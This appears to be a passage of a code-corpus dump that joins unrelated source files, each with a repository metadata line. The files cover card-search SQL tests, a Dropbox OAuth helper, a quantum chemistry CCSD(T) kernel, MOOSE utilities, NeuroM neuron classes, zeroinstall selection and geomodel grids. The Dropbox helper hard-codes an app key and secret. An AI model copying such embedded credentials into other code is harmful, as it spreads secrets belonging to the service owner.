do_functional_test('c:b -c:r o:trample', ['Abyssal Persecutor', 'Driven // Despair'], ['Child of Alara', 'Chromanticore'])
def test_color_not_text() -> None:
do_test('c:b -c:r o:trample', "((c.id IN (SELECT card_id FROM card_color WHERE color_id = 3))) AND NOT ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (oracle_text LIKE '%%trample%%')")
@pytest.mark.functional
def test_color_functional() -> None:
do_functional_test('c:g', ['Destructive Revelry', 'Rofellos, Llanowar Emissary', 'Tattermunge Maniac'], ['Ancient Grudge', 'Forest', 'Lightning Bolt'])
def test_color_green() -> None:
do_test('c:g', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5)))')
def test_or() -> None:
do_test('a OR b', "(name LIKE '%%a%%') OR (name LIKE '%%b%%')")
def test_bad_or() -> None:
do_test('orgg', "(name LIKE '%%orgg%%')")
def test_or_without_args() -> None:
try:
do_test('or GG', "(name LIKE '%%or gg%%')")
except search.InvalidSearchException:
pass
def test_not_without_args() -> None:
try:
do_test('c:r NOT', 'Expected InvalidSearchException')
except search.InvalidSearchException:
pass
def test_or_with_args() -> None:
do_test('AA or GG', "(name LIKE '%%aa%%') OR (name LIKE '%%gg%%')")
def test_text() -> None:
do_test('o:"target attacking"', "(oracle_text LIKE '%%target attacking%%')")
do_test('fulloracle:"target attacking"', "(oracle_text LIKE '%%target attacking%%')")
def test_name() -> None:
do_test('tension turtle', "(name LIKE '%%tension%%') AND (name LIKE '%%turtle%%')")
def test_parentheses() -> None:
do_test('x OR (a OR (b AND c))', "(name LIKE '%%x%%') OR ((name LIKE '%%a%%') OR ((name LIKE '%%b%%') AND (name LIKE '%%c%%')))")
@pytest.mark.functional
def test_toughness_functional() -> None:
do_functional_test('c:r tou>2', ['Bonecrusher Giant', "Kroxa, Titan of Death's Hunger"], ['Endurance', 'Ragavan, Nimble Pilferer', 'Wurmcoil Engine'])
def test_toughness() -> None:
do_test('c:r tou>2', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (toughness IS NOT NULL AND toughness > 2)')
def test_type() -> None:
do_test('t:"human wizard"', "(type_line LIKE '%%human wizard%%')")
def test_power() -> None:
do_test('t:wizard pow<2', "(type_line LIKE '%%wizard%%') AND (power IS NOT NULL AND power < 2)")
def test_mana_with_other() -> None:
do_test('t:creature mana=WW o:lifelink', "(type_line LIKE '%%creature%%') AND (mana_cost = '{W}{W}') AND (oracle_text LIKE '%%lifelink%%')")
def test_mana_alone() -> None:
do_test('mana=2uu', "(mana_cost = '{2}{U}{U}')")
def test_or_and_parentheses() -> None:
do_test('o:"target attacking" OR (mana=2uu AND (tou>2 OR pow>2))', "(oracle_text LIKE '%%target attacking%%') OR ((mana_cost = '{2}{U}{U}') AND ((toughness IS NOT NULL AND toughness > 2) OR (power IS NOT NULL AND power > 2)))")
@pytest.mark.functional
def test_not_color_functional() -> None:
do_functional_test('c:r -c:u', ['Lightning Bolt', 'Lightning Helix'], ['Bosh, Iron Golem', 'Electrolyze'])
def test_not_color() -> None:
do_test('c:r -c:u', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND NOT ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 2)))')
@pytest.mark.functional
def test_complex_functional() -> None:
do_functional_test('c:u OR (c:g tou>3)', ['Dragonlord Atarka', 'Endurance', 'Force of Negation', 'Teferi, Time Raveler', 'Venser, Shaper Savant'], ['Acidic Slime', 'Black Lotus', 'Giant Growth', 'Lightning Bolt', 'Wrenn and Six'])
def test_complex() -> None:
do_test('c:u OR (c:g tou>3)', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 2))) OR (((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5))) AND (toughness IS NOT NULL AND toughness > 3))')
def test_is_hybrid() -> None:
do_test('is:hybrid', "((mana_cost LIKE '%%/2%%') OR (mana_cost LIKE '%%/W%%') OR (mana_cost LIKE '%%/U%%') OR (mana_cost LIKE '%%/B%%') OR (mana_cost LIKE '%%/R%%') OR (mana_cost LIKE '%%/G%%'))")
def test_is_commander() -> None:
do_test('is:commander', "((type_line LIKE '%%legendary%%') AND ((type_line LIKE '%%creature%%') OR (oracle_text LIKE CONCAT('%%', name, ' can be your commander%%'))) AND (c.id IN (SELECT card_id FROM card_legality WHERE format_id = 4 AND legality <> 'Banned')))")
@pytest.mark.functional
def test_format_functional() -> None:
legal = ['Plains']
not_legal = ['Black Lotus']
do_functional_test('f:penny', legal, not_legal)
do_functional_test('f:pd', legal, not_legal)
do_functional_test('-f:penny', not_legal, legal)
do_functional_test('-f:pd', not_legal, legal)
do_functional_test('format:pd', legal, not_legal)
do_functional_test('legal:pd', legal, not_legal)
@pytest.mark.functional
def test_is_commander_illegal_commander_functional() -> None:
do_functional_test('c:g cmc=2 is:commander', ['Ayula, Queen Among Bears', 'Gaddock Teeg'], ['Fblthp, the Lost', 'Rofellos, Llanowar Emissary'])
def test_is_spikey() -> None:
where = search.parse(search.tokenize('is:spikey'))
assert 'Attune with Aether' in where
assert 'Balance' in where
assert "name = 'Yawgmoth''s Will'" in where
def do_functional_test(query: str, yes: List[str], no: List[str]) -> None:
results = search.search(query)
found = [c.name for c in results]
for name in yes:
assert name in found
for name in no:
assert name not in found
def do_test(query: str, expected: str) -> None:
where = search.parse(search.tokenize(query))
if where != expected:
print('\nQuery: {query}\nExpected: {expected}\n Actual: {actual}'.format(query=query, expected=expected, actual=where))
assert expected == where
| PennyDreadfulMTG/Penny-Dreadful-Tools | find/find_test.py | Python | gpl-3.0 | 23,978 | [
"Amber",
"BLAST"
] | 66df5a92a5a3951c75dce557c2865aac3896b02062b3caf2923b6910877248e5 |
# Include the Dropbox SDK libraries
from dropbox import session
# Onitu has a unique set of App key and secret to identify it.
ONITU_APP_KEY = "6towoytqygvexx3"
ONITU_APP_SECRET = "90hsd4z4d8eu3pp"
# ACCESS_TYPE should be 'dropbox' or 'app_folder' as configured for your app
ACCESS_TYPE = 'dropbox'
sess = session.DropboxSession(ONITU_APP_KEY, ONITU_APP_SECRET, ACCESS_TYPE)
request_token = sess.obtain_request_token()
url = sess.build_authorize_url(request_token)
# Make the user sign in and authorize this token
print("url: {}".format(url))
print("Please visit this website and press the 'Allow' button,"
" then hit 'Enter' here.")
# Python 2/3 compatibility
try:
raw_input()
except NameError:
input()
# This will fail if the user didn't visit the above URL
access_token = sess.obtain_access_token(request_token)
# Print the token for future reference
print("Use these keys to fill your setup.yml configuration file:")
print('Access Key:', access_token.key, 'Access Secret:', access_token.secret)
| onitu/onitu | drivers/dropbox/get_access_token.py | Python | mit | 1,017 | [
"VisIt"
] | aa189e37eec31ce5b968c9e970c577f8a1e7327be531ca6fc707deab0aedd629 |
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
GHF-CCSD(T) with spin-orbital integrals
'''
import time
import numpy
from pyscf import lib
from pyscf.lib import logger
from pyscf.cc import gccsd
# spin-orbital formula
# JCP, 98, 8718
def kernel(cc, eris, t1=None, t2=None, max_memory=2000, verbose=logger.INFO):
assert(isinstance(eris, gccsd._PhysicistsERIs))
if t1 is None or t2 is None:
t1, t2 = cc.t1, cc.t2
nocc, nvir = t1.shape
bcei = numpy.asarray(eris.ovvv).conj().transpose(3,2,1,0)
majk = numpy.asarray(eris.ooov).conj().transpose(2,3,0,1)
bcjk = numpy.asarray(eris.oovv).conj().transpose(2,3,0,1)
mo_e = eris.fock.diagonal().real
eia = mo_e[:nocc,None] - mo_e[nocc:]
d3 = lib.direct_sum('ia+jb+kc->ijkabc', eia, eia, eia)
t3c =(numpy.einsum('jkae,bcei->ijkabc', t2, bcei)
- numpy.einsum('imbc,majk->ijkabc', t2, majk))
t3c = t3c - t3c.transpose(0,1,2,4,3,5) - t3c.transpose(0,1,2,5,4,3)
t3c = t3c - t3c.transpose(1,0,2,3,4,5) - t3c.transpose(2,1,0,3,4,5)
t3c /= d3
# e4 = numpy.einsum('ijkabc,ijkabc,ijkabc', t3c.conj(), d3, t3c) / 36
# sia = numpy.einsum('jkbc,ijkabc->ia', eris.oovv, t3c) * .25
# e5 = numpy.einsum('ia,ia', sia, t1.conj())
# et = e4 + e5
# return et
t3d = numpy.einsum('ia,bcjk->ijkabc', t1, bcjk)
t3d += numpy.einsum('ai,jkbc->ijkabc', eris.fock[nocc:,:nocc], t2)
t3d = t3d - t3d.transpose(0,1,2,4,3,5) - t3d.transpose(0,1,2,5,4,3)
t3d = t3d - t3d.transpose(1,0,2,3,4,5) - t3d.transpose(2,1,0,3,4,5)
t3d /= d3
et = numpy.einsum('ijkabc,ijkabc,ijkabc', (t3c+t3d).conj(), d3, t3c) / 36
return et
if __name__ == '__main__':
from pyscf import gto
from pyscf import scf
from pyscf import cc
mol = gto.Mole()
mol.atom = [
[8 , (0. , 0. , 0.)],
[1 , (0. , -.957 , .587)],
[1 , (0.2, .757 , .487)]]
mol.basis = '631g'
mol.build()
mf = scf.RHF(mol).run(conv_tol=1e-1)
mycc = cc.CCSD(mf).set(conv_tol=1e-11).run()
et = mycc.ccsd_t()
mycc = cc.GCCSD(scf.addons.convert_to_ghf(mf)).set(conv_tol=1e-11).run()
eris = mycc.ao2mo()
print(kernel(mycc, eris) - et)
| gkc1000/pyscf | pyscf/cc/gccsd_t_slow.py | Python | apache-2.0 | 2,817 | [
"PySCF"
] | f903317330d7725a1274d371ff6f31df0000054635263b6a0f602379475cc8cd |
NAME = "Minbias1PV"
#from tempfile import mkstemp
#from shutil import move
#from os import remove, close
#
#def replace(file_path, pattern, subst):
# #Create temp file
# fh, abs_path = mkstemp()
# with open(abs_path,'w') as new_file:
# with open(file_path) as old_file:
# for line in old_file:
# new_file.write(line.replace(pattern, subst))
# close(fh)
# #Remove original file
# remove(file_path)
# #Move new file
# move(abs_path, file_path)
for polarity in ["MagDown"]:
#script = "/afs/cern.ch/user/s/sstahl/work/analysis/PVscriptMC.py"
script = "/afs/cern.ch/user/s/sstahl/work/analysis/evt_tuple.py"
optsfile = [File(script)]
script_opts = {"YEAR":"2015","POL":polarity}
PATH = "/LHCb/Collision15em/Beam6500GeV-VeloClosed-%(POL)s/Real Data/Reco15em/96000000/FULL.DST/" % script_opts
j = Job(
name = NAME + '_%(YEAR)s%(POL)s' %script_opts,
application = DaVinci(version='v36r7p6',optsfile=optsfile),
splitter = SplitByFiles(filesPerJob = 25),
inputdata = BKQuery(path=PATH, dqflag = "All").getDataset(),
outputfiles = [DiracFile("minbias.root")],
do_auto_resubmit = True,
backend = Dirac()
)
j.submit()
#queues.add(j.submit)
| saschastahl/ridge-analysis | scripts/GangaData2015.py | Python | mit | 1,323 | [
"DIRAC"
] | bc0bcd7083081e765293605e6429f8ce26f6d508ffa30cd1c8ac646d84b446de |
#!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
def expected(ini, res, ini_x, res_x):
lo2 = 0.5 * (res_x - ini_x)
alpha = (ini - res) / 4.0 / lo2**3
beta = -3.0 * alpha * lo2**2
data = [ini_x + i*(res_x - ini_x)/100 for i in range(100)]
data = [(x, alpha * (x - ini_x - lo2)**3 + beta * (x - ini_x - lo2) + (ini + res) / 2.0) for x in data]
return zip(*data)
def moose(fn):
coh = 10
f = open(fn)
data = [map(float, line.strip().split(",")) for line in f.readlines()[6:-1]]
f.close()
intnl = [d[2] for d in data]
plus_minus = [(0.5 * (d[5] - d[7]), 0.5 * (d[5] + d[7])) for d in data] # (Smax-Smin)/2, (Smax+Smin)/2
phi = [2.0 * np.arctan((np.sqrt(-pm[0]**2 + pm[1]**2 + coh**2) - pm[1]) / (pm[0] + coh)) for pm in plus_minus]
return (intnl, phi)
plt.figure()
expect21 = expected(0.174, 0.524, 0.0, 4E-6)
m21 = moose("gold/small_deform_hard22.csv")
plt.plot(expect21[0], expect21[1], 'k-', linewidth = 3.0, label = 'expected')
plt.plot(m21[0], m21[1], 'k^', label = 'MOOSE')
plt.legend(loc = 'lower right')
plt.xlabel("internal parameter")
plt.ylabel("Friction angle")
plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0))
plt.title("Friction-angle hardening")
plt.savefig("figures/small_deform_hard_22.eps")
sys.exit(0)
| nuclear-wizard/moose | modules/tensor_mechanics/test/tests/capped_mohr_coulomb/small_deform_hard_22.py | Python | lgpl-2.1 | 1,644 | [
"MOOSE"
] | 689eee2e7e0a5cf95f154e1d557a39187b0a8ce2eef264bba8f6f933e16dced3 |
#!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import collections
import subprocess
from .mooseutils import git_root_dir, colorText
def check_requirement(filename):
"""Check spec file for requirement documentation."""
import pyhit
messages = []
root = pyhit.load(filename)
design = root.children[0].get('design', '')
issues = root.children[0].get('issues', '')
deprecated = root.children[0].get('deprecated', False)
for child in root.children[0]:
if child.get('deprecated', deprecated):
continue
if 'requirement' not in child:
messages.append(" 'requirement' parameter is missing or empty in '{}' block.".format(child.name))
if not child.get('design', design).strip():
messages.append(" 'design' parameter is missing or empty in '{}' block.".format(child.name))
if not child.get('issues', issues).strip():
messages.append(" 'issues' parameter is missing or empty in '{}' block.".format(child.name))
for grandchild in child.children:
if 'detail' not in grandchild:
messages.append(" 'detail' parameter is missing or empty in '{}' block.".format(grandchild.name))
if 'requirement' in grandchild:
messages.append(" 'requirement' parameter in block '{}' must not be used within a group, use 'detail' instead.".format(grandchild.name))
if 'design' in grandchild:
messages.append(" 'design' parameter in block '{}' must not be used within a group.".format(grandchild.name))
if 'issues' in grandchild:
messages.append(" 'issues' parameter in block '{}' must not be used within a group.".format(grandchild.name))
if messages:
print('ERROR in {}'.format(filename))
print('\n'.join(messages) + '\n')
return 1
return 0
def sqa_check(working_dir=os.getcwd(), remote='origin', branch='devel', specs=['tests'], skip=[]):
"""Check that test specifications that were modified include requirements."""
# Fetch
cmd = ['git', 'fetch', remote]
subprocess.call(cmd)
# Root directory of repository
root = git_root_dir(working_dir)
# Check requirements on changed tests specs
count = 0
cmd = ['git', 'merge-base', '{}/{}'.format(remote, branch), 'HEAD']
sha = subprocess.check_output(cmd).decode().strip()
cmd = ['git', 'diff', sha, '--name-only']
for filename in subprocess.check_output(cmd).decode().split('\n'):
fullname = os.path.join(root, filename)
if os.path.isfile(fullname) and (os.path.basename(filename) in specs) and \
not any(s in filename for s in skip):
count += check_requirement(fullname)
return count
def sqa_check_requirement_duplicates(working_dir=os.getcwd(), specs=['tests'], skip=[]):
"""Check that no duplicate requirements exist."""
import pyhit
requirements = collections.defaultdict(list)
for root, dirs, files in os.walk(working_dir):
for fname in files:
filename = os.path.join(root, fname)
if fname in specs and not any(s in filename for s in skip):
node = pyhit.load(filename)
for child in node.children[0]:
req = child.get('requirement', None)
if req is not None:
requirements[req.strip()].append((filename, child.fullpath, child.line('requirement')))
count = 0
for key, value in requirements.items():
if len(value) > 1:
if count == 0:
print(colorText('Duplicate Requirements Found:\n', 'YELLOW'))
count += 1
if len(key) > 80:
print(colorText('{}...'.format(key[:80]), 'YELLOW'))
for filename, path, line in value:
print(' {}:{}'.format(filename, line))
return count
| nuclear-wizard/moose | python/mooseutils/sqa_check.py | Python | lgpl-2.1 | 4,229 | [
"MOOSE"
] | 837c5326bc91b46cbd72f421e6ea4520ffd052c37344cecb9f30b0f48075bda2 |
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Neuron classes and functions'''
from copy import deepcopy
from itertools import chain
import numpy as np
from neurom import morphmath
from neurom._compat import filter, map, zip
from neurom.core._soma import Soma
from neurom.core.dataformat import COLS
from neurom.utils import memoize
from . import NeuriteType, Tree
def iter_neurites(obj, mapfun=None, filt=None):
'''Iterator to a neurite, neuron or neuron population
Applies optional neurite filter and mapping functions.
Parameters:
obj: a neurite, neuron or neuron population.
mapfun: optional neurite mapping function.
filt: optional neurite filter function.
Examples:
Get the number of points in each neurite in a neuron population
>>> from neurom.core import iter_neurites
>>> n_points = [n for n in iter_neurites(pop, lambda x : len(x.points))]
Get the number of points in each axon in a neuron population
>>> import neurom as nm
>>> from neurom.core import iter_neurites
>>> filter = lambda n : n.type == nm.AXON
>>> mapping = lambda n : len(n.points)
>>> n_points = [n for n in iter_neurites(pop, mapping, filter)]
'''
neurites = ((obj,) if isinstance(obj, Neurite) else
obj.neurites if hasattr(obj, 'neurites') else obj)
neurite_iter = iter(neurites) if filt is None else filter(filt, neurites)
return neurite_iter if mapfun is None else map(mapfun, neurite_iter)
def iter_sections(neurites, iterator_type=Tree.ipreorder, neurite_filter=None):
'''Iterator to the sections in a neurite, neuron or neuron population.
Parameters:
neurites: neuron, population, neurite, or iterable containing neurite objects
iterator_type: type of the iteration (ipreorder, iupstream, ibifurcation_point)
neurite_filter: optional top level filter on properties of neurite neurite objects.
Examples:
Get the number of points in each section of all the axons in a neuron population
>>> import neurom as nm
>>> from neurom.core import ites_sections
>>> filter = lambda n : n.type == nm.AXON
>>> n_points = [len(s.points) for s in iter_sections(pop, neurite_filter=filter)]
'''
return chain.from_iterable(iterator_type(neurite.root_node)
for neurite in iter_neurites(neurites, filt=neurite_filter))
def iter_segments(obj, neurite_filter=None):
'''Return an iterator to the segments in a collection of neurites
Parameters:
obj: neuron, population, neurite, section, or iterable containing neurite objects
neurite_filter: optional top level filter on properties of neurite neurite objects
Note:
This is a convenience function provided for generic access to
neuron segments. It may have a performance overhead WRT custom-made
segment analysis functions that leverage numpy and section-wise iteration.
'''
sections = iter((obj,) if isinstance(obj, Section) else
iter_sections(obj, neurite_filter=neurite_filter))
return chain.from_iterable(zip(sec.points[:-1], sec.points[1:])
for sec in sections)
def graft_neuron(root_section):
'''Returns a neuron starting at root_section'''
assert isinstance(root_section, Section)
return Neuron(soma=Soma(root_section.points[:1]), neurites=[Neurite(root_section)])
class Section(Tree):
'''Class representing a neurite section'''
def __init__(self, points, section_id=None, section_type=NeuriteType.undefined):
super(Section, self).__init__()
self.id = section_id
self.points = points
self.type = section_type
@property
@memoize
def length(self):
'''Return the path length of this section.'''
return morphmath.section_length(self.points)
@property
@memoize
def area(self):
'''Return the surface area of this section.
The area is calculated from the segments, as defined by this
section's points
'''
return sum(morphmath.segment_area(s) for s in iter_segments(self))
@property
@memoize
def volume(self):
'''Return the volume of this section.
The volume is calculated from the segments, as defined by this
section's points
'''
return sum(morphmath.segment_volume(s) for s in iter_segments(self))
def __str__(self):
return 'Section(id=%s, type=%s, n_points=%s) <parent: %s, nchildren: %d>' % \
(self.id, self.type, len(self.points), self.parent, len(self.children))
__repr__ = __str__
class Neurite(object):
'''Class representing a neurite tree'''
def __init__(self, root_node):
self.root_node = root_node
self.type = root_node.type if hasattr(
root_node, 'type') else NeuriteType.undefined
@property
@memoize
def points(self):
'''Return unordered array with all the points in this neurite'''
# add all points in a section except the first one, which is a duplicate
_pts = [v for s in self.root_node.ipreorder()
for v in s.points[1:, COLS.XYZR]]
# except for the very first point, which is not a duplicate
_pts.insert(0, self.root_node.points[0][COLS.XYZR])
return np.array(_pts)
@property
@memoize
def length(self):
'''Return the total length of this neurite.
The length is defined as the sum of lengths of the sections.
'''
return sum(s.length for s in self.iter_sections())
@property
@memoize
def area(self):
'''Return the surface area of this neurite.
The area is defined as the sum of area of the sections.
'''
return sum(s.area for s in self.iter_sections())
@property
@memoize
def volume(self):
'''Return the volume of this neurite.
The volume is defined as the sum of volumes of the sections.
'''
return sum(s.volume for s in self.iter_sections())
def transform(self, trans):
'''Return a copy of this neurite with a 3D transformation applied'''
clone = deepcopy(self)
for n in clone.iter_sections():
n.points[:, 0:3] = trans(n.points[:, 0:3])
return clone
def iter_sections(self, order=Tree.ipreorder):
'''iteration over section nodes'''
return iter_sections(self, iterator_type=order)
def __deepcopy__(self, memo):
'''Deep copy of neurite object'''
return Neurite(deepcopy(self.root_node, memo))
def __nonzero__(self):
return bool(self.root_node)
def __eq__(self, other):
return self.type == other.type and self.root_node == other.root_node
def __hash__(self):
return hash((self.type, self.root_node))
__bool__ = __nonzero__
def __str__(self):
return 'Neurite <type: %s>' % self.type
__repr__ = __str__
class Neuron(object):
'''Class representing a simple neuron'''
def __init__(self, soma=None, neurites=None, sections=None, name='Neuron'):
self.soma = soma
self.name = name
self.neurites = neurites
self.sections = sections
def __str__(self):
return 'Neuron <soma: %s, n_neurites: %d>' % \
(self.soma, len(self.neurites))
__repr__ = __str__
| juanchopanza/NeuroM | neurom/core/_neuron.py | Python | bsd-3-clause | 9,124 | [
"NEURON"
] | cc6a0399aab3b4ceb23d79bb169224317b28c3505148b96d3e7088cf10e166ef |
"""
The B{0install select} command-line interface.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
import os, sys
import logging
from zeroinstall import _
from zeroinstall.cmd import UsageError
from zeroinstall.injector import model, selections, requirements
from zeroinstall.injector.policy import Policy
syntax = "URI"
def add_generic_select_options(parser):
"""All options for selecting."""
parser.add_option("", "--before", help=_("choose a version before this"), metavar='VERSION')
parser.add_option("", "--command", help=_("command to select"), metavar='COMMAND')
parser.add_option("", "--cpu", help=_("target CPU type"), metavar='CPU')
parser.add_option("", "--message", help=_("message to display when interacting with user"))
parser.add_option("", "--not-before", help=_("minimum version to choose"), metavar='VERSION')
parser.add_option("-o", "--offline", help=_("try to avoid using the network"), action='store_true')
parser.add_option("", "--os", help=_("target operation system type"), metavar='OS')
parser.add_option("-r", "--refresh", help=_("refresh all used interfaces"), action='store_true')
parser.add_option("-s", "--source", help=_("select source code"), action='store_true')
def add_options(parser):
"""Options for 'select' and 'download' (but not 'run')"""
add_generic_select_options(parser)
parser.add_option("", "--xml", help=_("write selected versions as XML"), action='store_true')
def get_selections(config, options, iface_uri, select_only, download_only, test_callback):
"""Get selections for iface_uri, according to the options passed.
Will switch to GUI mode if necessary.
@param options: options from OptionParser
@param iface_uri: canonical URI of the interface
@param select_only: return immediately even if the selected versions aren't cached
@param download_only: wait for stale feeds, and display GUI button as Download, not Run
@return: the selected versions, or None if the user cancels
@rtype: L{selections.Selections} | None
"""
if options.offline:
config.network_use = model.network_offline
# Try to load it as a feed. If it is a feed, it'll get cached. If not, it's a
# selections document and we return immediately.
maybe_selections = config.iface_cache.get_feed(iface_uri, selections_ok = True)
if isinstance(maybe_selections, selections.Selections):
if not select_only:
blocker = maybe_selections.download_missing(config)
if blocker:
logging.info(_("Waiting for selected implementations to be downloaded..."))
config.handler.wait_for_blocker(blocker)
return maybe_selections
r = requirements.Requirements(iface_uri)
r.parse_options(options)
policy = Policy(config = config, requirements = r)
# Note that need_download() triggers a solve
if options.refresh or options.gui:
# We could run immediately, but the user asked us not to
can_run_immediately = False
else:
if select_only:
# --select-only: we only care that we've made a selection, not that we've cached the implementations
policy.need_download()
can_run_immediately = policy.ready
else:
can_run_immediately = not policy.need_download()
stale_feeds = [feed for feed in policy.solver.feeds_used if
not feed.startswith('distribution:') and # Ignore (memory-only) PackageKit feeds
policy.is_stale(config.iface_cache.get_feed(feed))]
if download_only and stale_feeds:
can_run_immediately = False
if can_run_immediately:
if stale_feeds:
if policy.network_use == model.network_offline:
logging.debug(_("No doing background update because we are in off-line mode."))
else:
# There are feeds we should update, but we can run without them.
# Do the update in the background while the program is running.
from zeroinstall.injector import background
background.spawn_background_update(policy, options.verbose > 0)
return policy.solver.selections
# If the user didn't say whether to use the GUI, choose for them.
if options.gui is None and os.environ.get('DISPLAY', None):
options.gui = True
# If we need to download anything, we might as well
# refresh all the feeds first.
options.refresh = True
logging.info(_("Switching to GUI mode... (use --console to disable)"))
if options.gui:
gui_args = policy.requirements.get_as_options()
if download_only:
# Just changes the button's label
gui_args.append('--download-only')
if options.refresh:
gui_args.append('--refresh')
if options.verbose:
gui_args.insert(0, '--verbose')
if options.verbose > 1:
gui_args.insert(0, '--verbose')
if options.with_store:
for x in options.with_store:
gui_args += ['--with-store', x]
if select_only:
gui_args.append('--select-only')
from zeroinstall import helpers
sels = helpers.get_selections_gui(iface_uri, gui_args, test_callback)
if not sels:
return None # Aborted
else:
# Note: --download-only also makes us stop and download stale feeds first.
downloaded = policy.solve_and_download_impls(refresh = options.refresh or download_only or False,
select_only = select_only)
if downloaded:
config.handler.wait_for_blocker(downloaded)
sels = selections.Selections(policy)
return sels
def handle(config, options, args):
if len(args) != 1:
raise UsageError()
iface_uri = model.canonical_iface_uri(args[0])
sels = get_selections(config, options, iface_uri,
select_only = True, download_only = False, test_callback = None)
if not sels:
sys.exit(1) # Aborted by user
if options.xml:
show_xml(sels)
else:
show_human(sels, config.stores)
def show_xml(sels):
doc = sels.toDOM()
doc.writexml(sys.stdout)
sys.stdout.write('\n')
def show_human(sels, stores):
from zeroinstall import zerostore
done = set() # detect cycles
def print_node(uri, command, indent):
if uri in done: return
done.add(uri)
impl = sels.selections.get(uri, None)
print indent + "- URI:", uri
if impl:
print indent + " Version:", impl.version
try:
if impl.id.startswith('package:'):
path = "(" + impl.id + ")"
else:
path = impl.local_path or stores.lookup_any(impl.digests)
except zerostore.NotStored:
path = "(not cached)"
print indent + " Path:", path
indent += " "
deps = impl.dependencies
if command is not None:
deps += sels.commands[command].requires
for child in deps:
if isinstance(child, model.InterfaceDependency):
if child.qdom.name == 'runner':
child_command = command + 1
else:
child_command = None
print_node(child.interface, child_command, indent)
else:
print indent + " No selected version"
if sels.commands:
print_node(sels.interface, 0, "")
else:
print_node(sels.interface, None, "")
| pombredanne/zero-install | zeroinstall/cmd/select.py | Python | lgpl-2.1 | 6,751 | [
"VisIt"
] | 6979fb741acaeef3fb2d4f86c0a1a22571733e7462e107e430bb43bdc4e5f77e |
'''Module with classes and methods to analyse and process exported geomodel grids
Created on 21/03/2014
@author: Florian Wellmann (some parts originally developed by Erik Schaeffer)
'''
import numpy as np
try:
import matplotlib.pyplot as plt
except ImportError:
print("\n\n\tMatplotlib not installed - plotting functions will not work!\n\n\n")
# import mpl_toolkits
# from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# to convert python variable types to cpp types
import ctypes
# to create array
from numpy.ctypeslib import ndpointer
# to create folder
import os
# read out and change xml file (here only used to read out model boundary information)
import geomodeller_xml_obj as GO
class GeoGrid():
"""Object definition for exported geomodel grids"""
def __init__(self, **kwds):
"""GeoGrid contains methods to load, analyse, and process exported geomodel grids
**Optional Keywords**:
- *grid_filename* = string : filename of exported grid
- *delxyz_filename* = string : file with model discretisation
- *dimensions_filename* = string : file with model dimension (coordinates)
"""
if kwds.has_key('grid_filename'):
self.grid_filename = kwds['grid_filename']
if kwds.has_key('delxyz_filename'):
self.delxyz_filename = kwds['delxyz_filename']
if kwds.has_key('dimensions_filename'):
self.dimensions_filename = kwds['dimensions_filename']
def __add__(self, G_other):
"""Combine grid with another GeoGrid if regions are overlapping"""
# check overlap
print self.ymin, self.ymax
print G_other.ymin, G_other.ymax
if (G_other.ymin < self.ymax and G_other.ymin > self.ymin):
print("Grids overlapping in y-direction between %.0f and %.0f" %
(G_other.ymin, self.ymax))
def load_grid(self):
"""Load exported grid, discretisation and dimensions from file"""
if not hasattr(self, 'grid_filename'):
raise AttributeError("Grid filename is not defined!")
self.grid = np.loadtxt(self.grid_filename,
delimiter = ',',
dtype='int',
unpack=False)
if hasattr(self, 'delxyz_filename'):
self.load_delxyz(self.delxyz_filename)
